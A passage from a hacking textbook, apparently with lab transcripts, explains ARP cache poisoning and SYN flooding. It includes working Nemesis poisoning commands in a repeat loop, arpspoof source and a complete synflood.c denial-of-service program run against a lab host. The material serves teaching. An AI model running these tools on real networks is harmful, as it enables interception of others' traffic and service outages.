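The advantage of a switched environment is that devices are only sent packets that are meant for them, so promiscuous devices aren't able to sniff any additional packets. But even in a switched environment, there are clever ways to sniff other devices' packets; they just tend to be a bit more complex. In order to find hacks like these, the details of the protocols must be examined and then combined.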

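One important aspect of network communications that can be manipulated for interesting effects is the source address. There's no provision in these protocols to ensure that the source address in a packet really is the address of the source machine. The act of forging a source address in a packet is known as spoofing. The addition of spoofing to your bag of tricks greatly increases the number of possible hacks, since most systems expect the source address to be valid.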

Figure 0x400-7.

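Spoofing is the first step in sniffing packets on a switched network. The other two interesting details are found in ARP. First, when an ARP reply comes in with an IP address that already exists in the ARP cache, the receiving system will overwrite the prior MAC address information with the new information found in the reply (unless that entry in the ARP cache was explicitly marked as permanent). Second, no state information about the ARP traffic is kept, since this would require additional memory and would complicate a protocol that is meant to be simple. This means systems will accept an ARP reply even if they didn't send out an ARP request.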

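These three details, when exploited properly, allow an attacker to sniff network traffic on a switched network using a technique known as ARP redirection. The attacker sends spoofed ARP replies to certain devices, causing their ARP cache entries to be overwritten with the attacker's data. This technique is called ARP cache poisoning. In order to sniff network traffic between two points, A and B, the attacker needs to poison the ARP cache of A to cause A to believe that B's IP address is at the attacker's MAC address, and also poison the ARP cache of B to cause B to believe that A's IP address is also at the attacker's MAC address. Then the attacker's machine simply needs to forward these packets to their appropriate final destinations. After that, all of the traffic between A and B still gets delivered, but it all flows through the attacker's machine, as shown here.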

Figure 0x400-8.

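Since A and B are wrapping their own Ethernet headers on their packets based on their respective ARP caches, A's IP traffic meant for B is actually sent to the attacker's MAC address, and vice versa. The switch only filters traffic based on MAC address, so the switch will work as it's designed to, sending A's and B's IP traffic, destined for the attacker's MAC address, to the attacker's port. Then the attacker rewraps the IP packets with the proper Ethernet headers and sends them back to the switch, where they are finally routed to their proper destination. The switch works properly; it's the victim machines that are tricked into redirecting their traffic through the attacker's machine.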

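Due to timeout values, the victim machines will periodically send out real ARP requests and receive real ARP replies in response. In order to maintain the redirection attack, the attacker must keep the victim machines' ARP caches poisoned. A simple way to accomplish this is to send spoofed ARP replies to both A and B at a constant interval, for example, every 10 seconds.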

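A gateway is a system that routes all the traffic from a local network out to the Internet. ARP redirection is particularly interesting when one of the victim machines is the default gateway, since the traffic between the default gateway and another system is that system's Internet traffic. For example, if a machine at 192.168.0.118 is communicating with the gateway at 192.168.0.1 over a switch, the traffic will be restricted by MAC address. This means that this traffic cannot normally be sniffed, even in promiscuous mode. In order to sniff this traffic, it must be redirected.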

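To redirect the traffic, first the MAC addresses of 192.168.0.118 and 192.168.0.1 need to be determined. This can be done by pinging these hosts, since any IP connection attempt will use ARP. If you run a sniffer, you can see the ARP communications, but the OS will also cache the resulting IP/MAC address associations.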

reader@hacking:~/booksrc $ ping -c 1 -w 1 192.168.0.1
PING 192.168.0.1 (192.168.0.1): 56 octets data
64 octets from 192.168.0.1: icmp_seq=0 ttl=64 time=0.4 ms
--- 192.168.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.4/0.4/0.4 ms
reader@hacking:~/booksrc $ ping -c 1 -w 1 192.168.0.118
PING 192.168.0.118 (192.168.0.118): 56 octets data
64 octets from 192.168.0.118: icmp_seq=0 ttl=128 time=0.4 ms
--- 192.168.0.118 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.4/0.4/0.4 ms
reader@hacking:~/booksrc $ arp -na
? (192.168.0.1) at 00:50:18:00:0F:01 [ether] on eth0
? (192.168.0.118) at 00:C0:F0:79:3D:30 [ether] on eth0
reader@hacking:~/booksrc $ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:00:AD:D1:C7:ED
          inet addr:192.168.0.193  Bcast:192.168.0.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING  MTU:1500  Metric:1
          RX packets:4153 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3875 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:601686 (587.5 Kb)  TX bytes:288567 (281.8 Kb)
          Interrupt:9 Base address:0xc000 
reader@hacking:~/booksrc $

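After pinging, the MAC addresses for both 192.168.0.118 and 192.168.0.1 are in the attacker's ARP cache. This way, packets can reach their final destinations after being redirected to the attacker's machine. Assuming IP forwarding capabilities are compiled into the kernel, all we need to do is send some spoofed ARP replies at regular intervals. 192.168.0.118 needs to be told that 192.168.0.1 is at 00:00:AD:D1:C7:ED, and 192.168.0.1 needs to be told that 192.168.0.118 is also at 00:00:AD:D1:C7:ED. These spoofed ARP packets can be injected using a command-line packet injection tool called Nemesis. Nemesis was originally a suite of tools written by Mark Grimes, but in the most recent version, 1.4, all functionality has been rolled up into a single utility by the new maintainer and developer, Jeff Nathan. The source code for Nemesis is on the LiveCD at /usr/src/nemesis-1.4/, and it has already been built and installed.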

reader@hacking:~/booksrc $ nemesis

NEMESIS -=- The NEMESIS Project Version 1.4 (Build 26)

NEMESIS Usage:
  nemesis [mode] [options]

NEMESIS modes:
  arp
  dns
  ethernet
  icmp
  igmp
  ip
  ospf (currently non-functional)
  rip
  tcp
  udp

NEMESIS options: 
  To display options, specify a mode with the option "help".

reader@hacking:~/booksrc $ nemesis arp help

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

ARP/RARP Usage:
  arp [-v (verbose)] [options]

ARP/RARP Options: 
  -S <Source IP address>
  -D <Destination IP address>
  -h <Sender MAC address within ARP frame>
  -m <Target MAC address within ARP frame>
  -s <Solaris style ARP requests with target hardware addess set to broadcast>
  -r ({ARP,RARP} REPLY enable)
  -R (RARP enable)
  -P <Payload file>

Data Link Options: 
  -d <Ethernet device name>
  -H <Source MAC address>
  -M <Destination MAC address>

You must define a Source and Destination IP address.

reader@hacking:~/booksrc $ sudo nemesis arp -v -r -d eth0 -S 192.168.0.1 -D 192.168.0.118 -h 00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -M 00:C0:F0:79:3D:30

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

               [MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
     [Ethernet type] ARP (0x0806)

  [Protocol addr:IP] 192.168.0.1 > 192.168.0.118
 [Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
        [ARP opcode] Reply
  [ARP hardware fmt] Ethernet (1)
  [ARP proto format] IP (0x0800)
  [ARP protocol len] 6
  [ARP hardware len] 4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB

ARP Packet Injected
reader@hacking:~/booksrc $ sudo nemesis arp -v -r -d eth0 -S 192.168.0.118 -D 192.168.0.1 -h 00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M 00:50:18:00:0F:01

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

               [MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
     [Ethernet type] ARP (0x0806)

  [Protocol addr:IP] 192.168.0.118 > 192.168.0.1
 [Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
        [ARP opcode] Reply
  [ARP hardware fmt] Ethernet (1)
  [ARP proto format] IP (0x0800)
  [ARP protocol len] 6
  [ARP hardware len] 4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB.

ARP Packet Injected 
reader@hacking:~/booksrc $

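These two commands spoof ARP replies from 192.168.0.1 to 192.168.0.118 and vice versa, both claiming that their MAC address is the attacker's MAC address of 00:00:AD:D1:C7:ED. If these commands are repeated every 10 seconds, these bogus ARP replies will continue to keep the ARP caches poisoned and the traffic redirected. The standard BASH shell allows commands to be scripted, using familiar control flow statements. A simple BASH shell while loop is used below to loop forever, sending our two poisoning ARP replies every 10 seconds.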

reader@hacking:~/booksrc $ while true
> do
> sudo nemesis arp -v -r -d eth0 -S 192.168.0.1 -D 192.168.0.118 -h 00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -M 00:C0:F0:79:3D:30
> sudo nemesis arp -v -r -d eth0 -S 192.168.0.118 -D 192.168.0.1 -h 00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M 00:50:18:00:0F:01
> echo "Redirecting..."
> sleep 10
> done

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

               [MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
     [Ethernet type] ARP (0x0806)

  [Protocol addr:IP] 192.168.0.1 > 192.168.0.118
 [Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
        [ARP opcode] Reply
  [ARP hardware fmt] Ethernet (1)
  [ARP proto format] IP (0x0800)
  [ARP protocol len] 6
  [ARP hardware len] 4
Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB.

ARP Packet Injected

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

               [MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
     [Ethernet type] ARP (0x0806)

  [Protocol addr:IP] 192.168.0.118 > 192.168.0.1
 [Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
        [ARP opcode] Reply
  [ARP hardware fmt] Ethernet (1)
  [ARP proto format] IP (0x0800)
  [ARP protocol len] 6
  [ARP hardware len] 4
Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB.
ARP Packet Injected 
Redirecting...

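You can see how something as simple as Nemesis and the standard BASH shell can be used to quickly hack together a network exploit. Nemesis uses a C library called libnet to craft spoofed packets and inject them. Similar to libpcap, this library uses raw sockets and evens out the inconsistencies between platforms with a standardized interface. libnet also provides several convenient functions for dealing with network packets, such as checksum generation.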
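
To give an idea of what checksum generation involves, here is a generic sketch of the Internet checksum described in RFC 1071, which is the kind of checksum used in the IP header. It is not libnet's code, and the function name internet_checksum() is invented for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Sketch of the RFC 1071 Internet checksum: the one's complement of the
 * one's complement sum of the data taken as big-endian 16-bit words.
 * The result is a plain number; store it high byte first in a header. */
uint16_t internet_checksum(const unsigned char *data, size_t len) {
  uint32_t sum = 0;
  size_t i;

  for (i = 0; i + 1 < len; i += 2)
    sum += ((uint32_t)data[i] << 8) | data[i + 1];
  if (len & 1)
    sum += (uint32_t)data[len - 1] << 8;  /* pad a trailing odd byte with zero */
  while (sum >> 16)
    sum = (sum & 0xffff) + (sum >> 16);   /* fold carries back into 16 bits */
  return (uint16_t)~sum;
}
```

When building a header, the checksum field is zeroed first and the function is run over the header bytes. A receiver can run the same function over the header with the checksum in place and expect a result of zero.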

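The libnet library provides a simple and uniform API to craft and inject network packets. It's well documented, and the functions have descriptive names. A high-level glance at the source code for Nemesis shows how easy it is to craft ARP packets using libnet. The nemesis_arp() function shown below is called in nemesis.c to build and inject an ARP packet.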

From nemesis-arp.c

static ETHERhdr etherhdr;
static ARPhdr arphdr;

...

void nemesis_arp(int argc, char **argv)
{
    const char *module= "ARP/RARP Packet Injection";

    nemesis_maketitle(title, module, version);

    if (argc > 1 && !strncmp(argv[1], "help", 4))
        arp_usage(argv[0]);

    arp_initdata();
    arp_cmdline(argc, argv);
    arp_validatedata();
    arp_verbose();

    if (got_payload)
    {
        if (builddatafromfile(ARPBUFFSIZE, &pd, (const char *)file,
                    (const u_int32_t)PAYLOADMODE) < 0)
            arp_exit(1);
    }

    if (buildarp(&etherhdr, &arphdr, &pd, device, reply) < 0)
    {
        printf("\n%s Injection Failure\n", (rarp == 0 ? "ARP" : "RARP"));
        arp_exit(1);
    }
    else
    {
        printf("\n%s Packet Injected\n", (rarp == 0 ? "ARP" : "RARP"));
        arp_exit(0);
    }
}

The structures ETHERhdr and ARPhdr are defined in the file nemesis.h (shown below) as aliases for existing libnet data structures. In C, typedef is used to alias a data type with a symbol.

From nemesis.h

typedef struct libnet_arp_hdr ARPhdr;
typedef struct libnet_as_lsa_hdr ASLSAhdr;
typedef struct libnet_auth_hdr AUTHhdr;
typedef struct libnet_dbd_hdr DBDhdr;
typedef struct libnet_dns_hdr DNShdr;
typedef struct libnet_ethernet_hdr ETHERhdr;
typedef struct libnet_icmp_hdr ICMPhdr;
typedef struct libnet_igmp_hdr IGMPhdr; 
typedef struct libnet_ip_hdr IPhdr;

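The nemesis_arp() function calls a series of other functions from this file: arp_initdata(), arp_cmdline(), arp_validatedata(), and arp_verbose(). You can probably guess that these functions initialize data, process command-line arguments, validate data, and do some sort of verbose reporting. The arp_initdata() function does exactly this, initializing values in statically declared data structures.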

The arp_initdata() function, shown below, sets various elements of the header structures to the appropriate values for an ARP packet.

From nemesis-arp.c

static void arp_initdata(void)
{
    /* defaults */
    etherhdr.ether_type = ETHERTYPE_ARP;  /* Ethernet type ARP */
    memset(etherhdr.ether_shost, 0, 6);   /* Ethernet source address */
    memset(etherhdr.ether_dhost, 0xff, 6); /* Ethernet destination address */
    arphdr.ar_op = ARPOP_REQUEST;         /* ARP opcode: request */
    arphdr.ar_hrd = ARPHRD_ETHER;         /* hardware format: Ethernet */
    arphdr.ar_pro = ETHERTYPE_IP;         /* protocol format: IP */
    arphdr.ar_hln = 6;                    /* 6 byte hardware addresses */
    arphdr.ar_pln = 4;                    /* 4 byte protocol addresses */
    memset(arphdr.ar_sha, 0, 6);          /* ARP frame sender address */
    memset(arphdr.ar_spa, 0, 4);           /* ARP sender protocol (IP) addr */
    memset(arphdr.ar_tha, 0, 6);          /* ARP frame target address */
    memset(arphdr.ar_tpa, 0, 4);          /* ARP target protocol (IP) addr */
    pd.file_mem = NULL;
    pd.file_s = 0;
    return;
}
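
The 6-byte hardware and 4-byte protocol address lengths set above also explain the 42-byte size reported in the Nemesis output earlier. The following stand-alone sketch lays out an Ethernet/IPv4 ARP packet body byte by byte; the structure and field names are illustrative and are not libnet's definitions.

```c
#include <stddef.h>

/* Illustrative layout of an Ethernet/IPv4 ARP packet body. Every member is
 * a byte array or single byte, so the compiler has no reason to add padding. */
struct arp_eth_ip {
  unsigned char hw_type[2];     /* hardware format (1 = Ethernet) */
  unsigned char proto_type[2];  /* protocol format (0x0800 = IP) */
  unsigned char hw_len;         /* hardware address length: 6 */
  unsigned char proto_len;      /* protocol address length: 4 */
  unsigned char opcode[2];      /* 1 = request, 2 = reply */
  unsigned char sender_mac[6];  /* sender hardware address */
  unsigned char sender_ip[4];   /* sender protocol address */
  unsigned char target_mac[6];  /* target hardware address */
  unsigned char target_ip[4];   /* target protocol address */
};

/* Size of a complete frame: 14-byte Ethernet header plus the ARP body. */
size_t arp_frame_bytes(void) {
  return 14 + sizeof(struct arp_eth_ip);
}
```

The ARP body is 8 + 6 + 4 + 6 + 4 = 28 bytes, and adding the 14-byte Ethernet header gives the 42 bytes seen on the wire.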

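Finally, the nemesis_arp() function calls the function buildarp() with pointers to the header data structures. Judging from the way the return value from buildarp() is handled here, buildarp() builds the packet and injects it. This function is found in yet another source file, nemesis-proto_arp.c.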

From nemesis-proto_arp.c

int buildarp(ETHERhdr *eth, ARPhdr *arp, FileData *pd, char *device,
        int reply)
{
    int n = 0;
    u_int32_t arp_packetlen;
    static u_int8_t *pkt;
    struct libnet_link_int *l2 = NULL;

    /* validation tests */

    if (pd->file_mem == NULL)
        pd->file_s = 0;

    arp_packetlen = LIBNET_ARP_H + LIBNET_ETH_H + pd->file_s;

#ifdef DEBUG
    printf("DEBUG: ARP packet length %u.\n", arp_packetlen);
    printf("DEBUG: ARP payload size  %u.\n", pd->file_s);
#endif

    if ((l2 = libnet_open_link_interface(device, errbuf)) == NULL)
    {
        nemesis_device_failure(INJECTION_LINK, (const char *)device);
        return -1;
    }

    if (libnet_init_packet(arp_packetlen, &pkt) == -1)
    {
        fprintf(stderr, "ERROR: Unable to allocate packet memory.\n");
        return -1;
    }

    libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, eth->ether_type,
            NULL, 0, pkt);

    libnet_build_arp(arp->ar_hrd, arp->ar_pro, arp->ar_hln, arp->ar_pln,
            arp->ar_op, arp->ar_sha, arp->ar_spa, arp->ar_tha, arp->ar_tpa,
            pd->file_mem, pd->file_s, pkt + LIBNET_ETH_H);

    n = libnet_write_link_layer(l2, device, pkt, LIBNET_ETH_H +
                LIBNET_ARP_H + pd->file_s);

    if (verbose == 2)
        nemesis_hexdump(pkt, arp_packetlen, HEX_ASCII_DECODE);
    if (verbose == 3)
        nemesis_hexdump(pkt, arp_packetlen, HEX_RAW_DECODE);

    if (n != arp_packetlen)
    {
        fprintf(stderr, "ERROR: Incomplete packet injection.  Only "
                "wrote %d bytes.\n", n);
    }
    else
    {
        if (verbose)
        {
            if (memcmp(eth->ether_dhost, (void *)&one, 6))
            {
                printf("Wrote %d byte unicast ARP request packet through "
                        "linktype %s.\n", n,
                        nemesis_lookup_linktype(l2->linktype));
            }
            else
            {
                printf("Wrote %d byte %s packet through linktype %s.\n", n,
                        (eth->ether_type == ETHERTYPE_ARP ? "ARP" : "RARP"),
                        nemesis_lookup_linktype(l2->linktype));
            }
        }
    }

    libnet_destroy_packet(&pkt);
    if (l2 != NULL)
        libnet_close_link_interface(l2);
    return (n);
}

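At a high level, this function should be readable to you. Using libnet functions, it opens a link interface and initializes memory for a packet. Then, it builds the Ethernet layer using elements from the Ethernet header data structure and does the same for the ARP layer. Next, it writes the packet to the device to inject it, and finally cleans up by destroying the packet and closing the interface. The documentation for these functions from the libnet man page is shown below for reference.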

From the libnet Man Page

`libnet_open_link_interface()` opens a low-level packet interface. This is 
required to write link layer frames. Supplied is a u_char pointer to the
interface device name and a u_char pointer to an error buffer. Returned is a
filled in libnet_link_int struct or NULL on error.

`libnet_init_packet()` initializes a packet for use. If the size parameter is
omitted (or negative) the library will pick a reasonable value for the user
(currently LIBNET_MAX_PACKET). If the memory allocation is successful, the
memory is zeroed and the function returns 1. If there is an error, the
function returns -1. Since this function calls malloc, you certainly should,
at some point, make a corresponding call to destroy_packet().

`libnet_build_ethernet()` constructs an ethernet packet. Supplied is the
destination address, source address (as arrays of unsigned character bytes)
and the ethernet frame type, a pointer to an optional data payload, the
payload length, and a pointer to a pre-allocated block of memory for the
packet. The ethernet packet type should be one of the following:

Value               Type
ETHERTYPE_PUP       PUP protocol
ETHERTYPE_IP        IP protocol
ETHERTYPE_ARP       ARP protocol
ETHERTYPE_REVARP    Reverse ARP protocol
ETHERTYPE_VLAN      IEEE VLAN tagging
ETHERTYPE_LOOPBACK  Used to test interfaces

`libnet_build_arp()` constructs an ARP (Address Resolution Protocol) packet.
Supplied are the following: hardware address type, protocol address type, the
hardware address length, the protocol address length, the ARP packet type, the
sender hardware address, the sender protocol address, the target hardware
address, the target protocol address, the packet payload, the payload size,
and finally, a pointer to the packet header memory. Note that this function
only builds ethernet/IP ARP packets, and consequently the first value should
be ARPHRD_ETHER. The ARP packet type should be one of the following:
ARPOP_REQUEST, ARPOP_REPLY, ARPOP_REVREQUEST, ARPOP_REVREPLY,
ARPOP_INVREQUEST, or ARPOP_INVREPLY.

`libnet_destroy_packet()` frees the memory associated with the packet.

`libnet_close_link_interface()` closes an opened low-level packet interface.
Returned is 1 upon success or -1 on error.

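With a basic understanding of C, API documentation, and common sense, you can teach yourself just by examining open source projects. For example, Dug Song provides a program called arpspoof, included with dsniff, that performs the ARP redirection attack.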

From the arpspoof Man Page

NAME
       arpspoof - intercept packets on a switched LAN

SYNOPSIS
       arpspoof [-i interface] [-t target] host

DESCRIPTION
       arpspoof redirects packets from a target host (or all hosts) on the LAN
       intended for another host on the LAN by forging ARP replies. This is
       an extremely effective way of sniffing traffic on a switch.

       Kernel IP forwarding (or a userland program which accomplishes the
       same, e.g. fragrouter(8)) must be turned on ahead of time.

OPTIONS
       -i interface
              Specify the interface to use.

       -t target
              Specify a particular host to ARP poison (if not  specified, all
              hosts on the LAN).

       host   Specify  the host you wish to intercept packets for (usually the
              local gateway).

SEE ALSO
       dsniff(8), fragrouter(8)

AUTHOR 
       Dug Song <dugsong@monkey.org>

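The magic of this program comes from its arp_send() function, which also uses libnet to spoof packets. The source code for this function should be readable to you, since many of the previously explained libnet functions are used. The use of structures and an error buffer should also be familiar.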

arpspoof.c

static struct libnet_link_int *llif;
static struct ether_addr spoof_mac, target_mac;
static in_addr_t spoof_ip, target_ip;

...

int
arp_send(struct libnet_link_int *llif, char *dev,
     int op, u_char *sha, in_addr_t spa, u_char *tha, in_addr_t tpa)
{
    char ebuf[128];
    u_char pkt[60];

    if (sha == NULL &&
        (sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) {
        return (-1);
    }
    if (spa == 0) {
        if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0)
            return (-1);
        spa = htonl(spa); /* XXX */
    }
    if (tha == NULL)
        tha = "\xff\xff\xff\xff\xff\xff";

    libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);

    libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4,
             op, sha, (u_char *)&spa, tha, (u_char *)&tpa,
             NULL, 0, pkt + ETH_H);

    fprintf(stderr, "%s ",
        ether_ntoa((struct ether_addr *)sha));

    if (op == ARPOP_REQUEST) {
        fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n",
            ether_ntoa((struct ether_addr *)tha),
            libnet_host_lookup(tpa, 0),
            libnet_host_lookup(spa, 0));
    }
    else {
        fprintf(stderr, "%s 0806 42: arp reply %s is-at ",
            ether_ntoa((struct ether_addr *)tha),
            libnet_host_lookup(spa, 0));
        fprintf(stderr, "%s\n",
            ether_ntoa((struct ether_addr *)sha));
    }
    return (libnet_write_link_layer(llif, dev, pkt, sizeof(pkt)) == sizeof(pkt));
}

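The remaining libnet functions get hardware addresses, get the IP address, and look up hosts. These functions have descriptive names and are explained in detail on the libnet man page.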

From the libnet Man Page

`libnet_get_hwaddr()` takes a pointer to a link layer interface struct, a
pointer to the network device name, and an empty buffer to be used in case of
error. The function returns the MAC address of the specified interface upon
success or 0 upon error (and errbuf will contain a reason).

`libnet_get_ipaddr()` takes a pointer to a link layer interface struct, a
pointer to the network device name, and an empty buffer to be used in case of
error. Upon success the function returns the IP address of the specified
interface in host-byte order or 0 upon error (and errbuf will contain a
reason).

`libnet_host_lookup()` converts the supplied network-ordered (big-endian) IPv4
address into its human-readable counterpart. If use_name is 1,
libnet_host_lookup() will attempt to resolve this IP address and return a
hostname, otherwise (or if the lookup fails), the function returns a dotted-
decimal ASCII string.

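Once you've learned how to read C code, existing programs can teach you a lot by example. Programming libraries like libnet and libpcap have plenty of documentation that explains all the details you may not be able to work out from the source alone. The goal here is to teach you how to learn from source code, as opposed to just teaching how to use a few libraries. After all, there are many other libraries and a lot of existing source code that uses them.

Denial of Service

One of the simplest forms of network attack is a Denial of Service (DoS) attack. Instead of trying to steal information, a DoS attack simply prevents access to a service or resource. There are two general forms of DoS attacks: those that crash services and those that flood services.

Denial of Service attacks that crash services are actually more similar to program exploits than to network-based exploits. Often, these attacks depend on a poor implementation by a specific vendor. A buffer overflow exploit gone wrong will usually just crash the target program instead of directing the execution flow to the injected shellcode. If this program happens to be on a server, then no one else can access that server after it has crashed. Crashing DoS attacks like this are closely tied to a certain program and a certain version. Since the operating system handles the network stack, crashes in this code will take down the kernel, denying service to the entire machine. Many of these vulnerabilities have long since been patched on modern operating systems, but it's still useful to think about how these techniques might be applied to different situations.

SYN Flooding

A SYN flood tries to exhaust states in the TCP/IP stack. Since TCP maintains "reliable" connections, each connection needs to be tracked somewhere. The TCP/IP stack in the kernel handles this, but it has a finite table that can only track so many incoming connections. A SYN flood takes advantage of this limitation.

The attacker floods the victim's system with many SYN packets, using a spoofed, nonexistent source address. Since a SYN packet is used to initiate a TCP connection, the victim's machine will send a SYN/ACK packet to the spoofed address in response and wait for the expected ACK response. Each of these waiting, half-open connections goes into a backlog queue that has limited space. Since the spoofed source addresses don't actually exist, the ACK responses needed to remove these entries from the queue and complete the connections never come. Instead, each half-open connection must time out, which takes a relatively long time.

As long as the attacker continues to flood the victim's system with spoofed SYN packets, the victim's backlog queue will remain full, making it nearly impossible for real SYN packets to get to the system and initiate valid TCP/IP connections.

Using the Nemesis and arpspoof source code as a reference, you should be able to write a program that performs this attack. The example program below uses libnet functions pulled from the source code and socket functions previously explained. The Nemesis source code uses the function libnet_get_prand() to obtain pseudo-random numbers for various IP fields. The function libnet_seed_prand() is used to seed the randomizer. These functions are similarly used below.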

synflood.c

#include <libnet.h>

#define FLOOD_DELAY 5000 // Delay between packet injects, in microseconds (5 ms).

/* Returns an IP in x.x.x.x notation */
char *print_ip(u_long *ip_addr_ptr) {
   return inet_ntoa( *((struct in_addr *)ip_addr_ptr) );
}

int main(int argc, char *argv[]) {
   u_long dest_ip;
   u_short dest_port;
   u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
   int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;

   if(argc < 3)
   {
      printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
      exit(1);
   }

   dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // The host
   dest_port = (u_short) atoi(argv[2]); // The port

   network = libnet_open_raw_sock(IPPROTO_RAW); // Open network interface. 
   if (network == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't open network interface.  -- this program must run as root.\n");
   libnet_init_packet(packet_size, &packet); // Allocate memory for packet. 
   if (packet == NULL)
      libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");

   libnet_seed_prand(); // Seed the random number generator.

   printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
   while(1) // loop forever (until break by CTRL-C)
   {
      libnet_build_ip(LIBNET_TCP_H,      // Size of the packet sans IP header.
         IPTOS_LOWDELAY,                 // IP tos
         libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
         0,                              // Frag stuff
         libnet_get_prand(LIBNET_PR8),   // TTL (randomized)
         IPPROTO_TCP,                    // Transport protocol
         libnet_get_prand(LIBNET_PRu32), // Source IP (randomized)
         dest_ip,                        // Destination IP
         NULL,                           // Payload (none)
         0,                              // Payload length
         packet);                        // Packet header memory

      libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // Source TCP port (random)
         dest_port,                      // Destination TCP port
         libnet_get_prand(LIBNET_PRu32), // Sequence number (randomized)
         libnet_get_prand(LIBNET_PRu32), // Acknowledgement number (randomized)
         TH_SYN,                         // Control flags (SYN flag set only)
         libnet_get_prand(LIBNET_PRu16), // Window size (randomized)
         0,                              // Urgent pointer
         NULL,                           // Payload (none)
         0,                              // Payload length
         packet + LIBNET_IP_H);          // Packet header memory

      if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
         libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");

      byte_count = libnet_write_ip(network, packet, packet_size); // Inject packet.
      if (byte_count < packet_size)
         libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written.  (%d of %d bytes)", byte_count, packet_size);

      usleep(FLOOD_DELAY); // Wait for FLOOD_DELAY microseconds.
   }

   libnet_destroy_packet(&packet); // Free packet memory.

   if (libnet_close_raw_sock(network) == -1) // Close the network interface.
      libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");

   return 0;
}

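This program uses a print_ip() function to handle converting the u_long type, used by libnet to store IP addresses, to the struct type expected by inet_ntoa(). The value doesn't change; the typecasting just appeases the compiler.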
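As a small illustration of that conversion, here is a minimal sketch that is not part of the book's source. The helper name ip_to_text() is hypothetical. It takes a fixed-width 32-bit value instead of u_long (on 64-bit systems u_long is typically 8 bytes, so the pointer cast above is best read as a 32-bit-era idiom) and copies the bytes with memcpy() rather than casting a pointer. Either way, the bytes of the address are left unchanged.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper (not from the book): returns x.x.x.x notation for an
 * IPv4 address that is already in network byte order. */
const char *ip_to_text(uint32_t ip_net_order) {
   struct in_addr addr;

   /* Copy the raw bytes into the struct; the value itself is unchanged. */
   memcpy(&addr, &ip_net_order, sizeof(addr));

   /* inet_ntoa() returns a pointer to a static buffer that the next call
    * overwrites, so copy the string if it needs to be kept. */
   return inet_ntoa(addr);
}
```

Calling ip_to_text(inet_addr("192.168.42.88")) gives back the same dotted-decimal string, which shows that only the type changed along the way.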

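The current release of libnet is version 1.1, which is incompatible with libnet 1.0. However, Nemesis and arpspoof still rely on the 1.0 version of libnet, so this version is included in the LiveCD, and it is also what we'll use in our synflood program. Similar to compiling with libpcap, when compiling with libnet, the flag -lnet is used. However, this isn't quite enough information for the compiler, as the output below shows.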

reader@hacking:~/booksrc $ gcc -o synflood synflood.c -lnet
In file included from synflood.c:1:
/usr/include/libnet.h:87:2: #error "byte order has not been specified, you'll"
synflood.c:6: error: syntax error before string constant
reader@hacking:~/booksrc $

The compiler still fails because several mandatory define flags need to be set for libnet. Included with libnet, a program called libnet-config will output these flags.

reader@hacking:~/booksrc $ libnet-config --help
Usage: libnet-config [OPTIONS]
Options:
        [--libs]
        [--cflags]
        [--defines]
reader@hacking:~/booksrc $ libnet-config --defines
-D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H
-DLIBNET_LIL_ENDIAN

Using the BASH shell's command substitution, these defines can be inserted dynamically into the compile command.

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o synflood synflood.c -lnet
reader@hacking:~/booksrc $ ./synflood
Usage:
./synflood       <target host> <target port>
reader@hacking:~/booksrc $ 
reader@hacking:~/booksrc $ ./synflood 192.168.42.88 22
Fatal: can't open network interface.  -- this program must run as root.
reader@hacking:~/booksrc $ sudo ./synflood 192.168.42.88 22 
